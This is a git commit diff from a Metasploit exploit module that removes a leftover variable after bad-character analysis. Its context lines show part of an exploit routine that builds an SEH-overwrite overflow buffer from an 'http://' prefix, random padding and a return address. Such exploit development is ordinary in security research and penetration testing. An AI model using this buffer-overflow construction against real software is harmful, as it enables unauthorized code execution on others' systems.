Forgot to remove this after badchar analysis
parent
37f731fe7d
commit
9d52048d7f
|
@ -64,8 +64,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
c = ''
|
||||
|
||||
buf = 'http://'
|
||||
buf << rand_text_alpha_upper(target['Offset'])
|
||||
buf << generate_seh_record(target.ret)
|
||||
|
|
Loading…
Reference in New Issue